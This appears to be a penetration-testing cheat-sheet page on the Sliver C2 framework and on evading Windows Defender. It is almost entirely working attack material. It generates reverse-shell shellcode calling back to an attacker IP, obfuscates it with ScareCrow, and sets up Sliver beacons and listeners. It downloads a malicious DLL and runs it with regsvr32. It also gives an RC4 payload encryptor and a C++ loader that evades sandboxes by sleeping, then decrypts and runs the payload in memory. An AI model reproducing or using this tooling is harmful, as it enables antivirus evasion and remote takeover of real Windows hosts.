Sliver C2

Install all post-exploitation tools

armory install all

Bypass Windows Defender

Generate a shellcode (with msfvenom).

msfvenom -p windows/x64/custom/reverse_winhttp LHOST=10.10.14.13 LPORT=9001 LURI=/hello.woff -f raw -o shellcode.bin

Download ScareCrow (require Golang).

git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
go build .

Obfusctate the shellcode with ScareCrow.

./ScareCrow -I shellcode.bin -Loader dll -nosign

Setup Sliver C2.

profiles new beacon --arch amd64 --os windows --mtls 10.10.14.13:9000 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 qu35t
stage-listener --url http://10.10.14.13:9001 --profile qu35t --prepend-size
mtls --lhost 10.10.14.13 --lport 9000

Upload and execute your malicious dll on the target machine.

mkdir C:/Temp/
cd C:/Temp/
(New-Object Net.WebClient).DownloadFile('http://10.10.14.13/qu35t.dll','C:\Temp\qu35t.dll')
regsvr32.exe .\qu35t.dll, DLLRegisterServer

import sys

def rc4(data, key):
    keylen = len(key)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % keylen]) % 256;
        s[i], s[j] = s[j], s[i]

    i = 0
    j = 0
    encrypted = bytearray()
    for n in range(len(data)):
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        s[i], s[j] = s[j], s[i]
        encrypted.append(data[n] ^ s[(s[i] + s[j]) % 256])

    return encrypted
    
if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: ./rc4.py <key> <filename>")
        exit(0)

    key = sys.argv[1]
    filename = sys.argv[2]

    with open(filename, 'rb') as f:
        data = f.read()

    encrypted = rc4(data, key.encode())

    with open(f"{filename}.enc", 'wb') as f:
        f.write(encrypted)

    print(f"Written {filename}.enc")

#include <stdio.h>
#include <Windows.h>
#include <chrono>
#include <thread>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

extern "C" void RunData();

void rc4(unsigned char* data, int len, const char* key) {
    int keylen = strlen(key);
    unsigned char s[256];
    for (int i = 0; i < 256; i++) {
        s[i] = i;
    }

    unsigned char j = 0;
    for (int i = 0; i < 256; i++) {
        j = (j + s[i] + key[i % keylen]) % 256;
        unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }

    int i = 0;
    j = 0;
    for (int n = 0; n < len; n++) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        data[n] ^= s[(s[i] + s[j]) % 256];
    }
}

int main(int argc, char** argv) {
    auto start = std::chrono::system_clock::now();
    std::this_thread::sleep_for(std::chrono::seconds(5));
    auto end = std::chrono::system_clock::now();
    std::chrono::duration<double> elapsed_seconds = end - start;
    if (elapsed_seconds.count() < 4.5) {
        exit(0);
    }
    const char* key = "advapi32.dll";
    int len = 2121221;
    DWORD oldProtect = 0;
    if (!VirtualProtect((LPVOID)&RunData, len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        printf("Error: %d", GetLastError());
    }
    rc4((unsigned char*)&RunData, len, key);
    VirtualProtect((LPVOID)&RunData, len, oldProtect, &oldProtect);
    RunData();
}

PreviousCommand Injections NextWindows credentials

Last updated 1 year ago